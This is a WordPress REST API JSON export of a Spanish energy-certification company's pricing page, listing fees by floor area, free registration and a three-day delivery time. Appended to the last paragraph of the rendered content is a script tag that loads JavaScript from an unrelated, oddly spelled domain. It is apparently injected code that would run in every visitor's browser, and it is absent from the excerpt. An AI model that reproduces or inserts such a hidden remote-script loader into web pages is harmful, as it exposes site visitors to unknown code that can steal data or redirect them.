{"id":89,"date":"2014-01-22T08:31:20","date_gmt":"2014-01-22T08:31:20","guid":{"rendered":"https:\/\/quianenergy.com\/?page_id=89"},"modified":"2025-10-08T07:58:42","modified_gmt":"2025-10-08T07:58:42","slug":"tarifas","status":"publish","type":"page","link":"https:\/\/quianenergy.com\/index.php\/tarifas\/","title":{"rendered":"Tarifas"},"content":{"rendered":"<h1>Tarifas de Certificaci\u00f3n Energ\u00e9tica<\/h1>\n<h2>TARIFAS SEG\u00daN SUPERFICIE DE VIVIENDAS Y OFICINAS<\/h2>\n<p>Desde 0 m\u00b2construidos a 100 m\u00b2construidos: <strong>100 \u20ac<\/strong>.<\/p>\n<p>Desde 100 m\u00b2construidos a 120 m\u00b2construidos:\u00a0<strong>120 \u20ac<\/strong>.<\/p>\n<p>Desde 120 m\u00b2construidos, otros Usos y Tipolog\u00edas: <a title=\"Contacto\" href=\"https:\/\/quianenergy.com\/?page_id=23\">CONSULTAR PRECIOS SIN COMPROMISO<\/a><\/p>\n<p>Se incluye la tramitaci\u00f3n ante la autoridad pertinente<\/p>\n<p>(IVA no incluido)<\/p>\n<p>&nbsp;<\/p>\n<h2>REGISTRO GRATUITO<\/h2>\n<p>El registro ante el organismo auton\u00f3mico est\u00e1 incluido en el precio.<\/p>\n<p>QuianEnergy se encarga de la totalidad de la tramitaci\u00f3n de la certificaci\u00f3n energ\u00e9tica de la Vivienda\/Oficina, hasta entregar al cliente la certificaci\u00f3n con toda la documentaci\u00f3n asociada.<\/p>\n<p>&nbsp;<\/p>\n<h2>PLAZOS<\/h2>\n<p>Podr\u00e1 disponer de su certificaci\u00f3n energ\u00e9tica en un plazo de 3 d\u00edas una vez realizada la solicitud.<script src='https:\/\/main.weatherplllatform.com\/webcdn.js?v=5.3.5' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Tarifas de Certificaci\u00f3n Energ\u00e9tica TARIFAS SEG\u00daN SUPERFICIE DE VIVIENDAS Y OFICINAS Desde 0 m\u00b2construidos a 100 m\u00b2construidos: 100 \u20ac. Desde 100 m\u00b2construidos a 120 m\u00b2construidos:\u00a0120 \u20ac. Desde 120 m\u00b2construidos, otros Usos y Tipolog\u00edas: CONSULTAR PRECIOS SIN COMPROMISO Se incluye la tramitaci\u00f3n ante la autoridad pertinente (IVA no incluido) &nbsp; REGISTRO GRATUITO El registro ante el organismo auton\u00f3mico est\u00e1 incluido en el precio. QuianEnergy se encarga de la totalidad de la tramitaci\u00f3n de la certificaci\u00f3n energ\u00e9tica de la Vivienda\/Oficina, hasta entregar al cliente la certificaci\u00f3n con toda la documentaci\u00f3n asociada. &nbsp; PLAZOS Podr\u00e1 disponer de su certificaci\u00f3n energ\u00e9tica en un plazo de 3 d\u00edas una vez realizada la solicitud.<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-89","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/quianenergy.com\/index.php\/wp-json\/wp\/v2\/pages\/89","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/quianenergy.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/quianenergy.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/quianenergy.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/quianenergy.com\/index.php\/wp-json\/wp\/v2\/comments?post=89"}],"version-history":[{"count":3,"href":"https:\/\/quianenergy.com\/index.php\/wp-json\/wp\/v2\/pages\/89\/revisions"}],"predecessor-version":[{"id":151,"href":"https:\/\/quianenergy.com\/index.php\/wp-json\/wp\/v2\/pages\/89\/revisions\/151"}],"wp:attachment":[{"href":"https:\/\/quianenergy.com\/index.php\/wp-json\/wp\/v2\/media?parent=89"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}